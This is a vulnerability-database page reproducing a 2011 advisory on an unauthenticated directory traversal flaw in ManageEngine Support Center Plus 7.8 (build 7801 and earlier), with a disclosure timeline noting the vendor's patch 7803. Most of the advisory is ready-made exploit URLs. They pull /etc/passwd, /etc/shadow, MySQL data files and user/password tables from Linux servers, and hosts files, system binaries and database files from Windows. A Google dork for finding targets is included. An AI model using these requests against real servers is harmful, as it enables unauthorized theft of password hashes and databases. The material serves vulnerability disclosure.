Lucene search
K

ManageEngine Support Center Plus 7.8 build <= 7801 Directory Traversal

🗓️ 23 Jun 2011 00:00:00Reported by xistenceType 
zdt
 zdt
🔗 0day.today👁 18 Views

ManageEngine Support Center Plus 7.8 build <= 7801 Directory Traversal Vulnerability allows unauthorized access to server files, including superuser files, without authentication. Vulnerability fixed by vendor with patch 7803

Code
Advisory:
ManageEngine Support Center Plus 7.8 build <= 7801 Directory Traversal Vulnerability
 
Author:
Robert 'xistence' van Hamburg - xistence<AT>0x90.nl
 
Software link:
http://www.manageengine.com/products/support-center/download.html
 
Tested on:
Linux & Windows
 
Category:
Directory Traversal
 
Severity:
High
 
Google Dork: intitle:ManageEngine SupportCenter Plus
 
Description:
 
It's possible to access all local files on the server and because Support Center Plus runs as root/Administrator by default it's possible to access files owned by superusers too.
This for example makes it possible to grab for the "/etc/shadow" file on a linux box.
An authenticated user on the helpdesk is not needed, so any attacker can exploit this vulnerability without credentials.
 
Requests Linux:
 
Grab the /etc/passwd & /etc/shadow:
 
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=passwd&module=Request&ID=1&path=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&delete=false
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=shadow&module=Request&ID=1&path=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow&delete=false
 
In a default situation the databasename is "supportcenter" and so it's easy to retrieve the database files like this:
 
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=ibdata1&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fibdata1&delete=false
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=ib_logfile0&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fib_logfile0&delete=false
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=ib_logfile1&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fib_logfile1&delete=false
 
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=aaapassword.frm&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fsupportcenter%2Faaapassword.frm&delete=false
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=aaauser.frm&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fsupportcenter%2Faaauser.frm&delete=false
 
 
Requests Windows:
 
Hosts file:
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=hosts&module=Request&ID=1&path=..\..\..\..\..\..\Windows\system32\drivers\etc\hosts&delete=false
 
Explorer.exe:
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=explorer.exe&module=Request&ID=1&path=..\..\..\..\..\..\Windows\explorer.exe&delete=false
 
MySQL database ibdata1 file:
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=ibdata1&module=Request&ID=1&path=..\..\mysql\data\ibdata1&delete=false
 
 
Disclosure:
- May 30 2011, vulnerability found
- May 30 2011, contacted vendor (ManageEngine) about security issues
- Jun 1 2011, vulnerability fixed by vendor (ManageEngine) and released as patch 7803



#  0day.today [2018-03-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation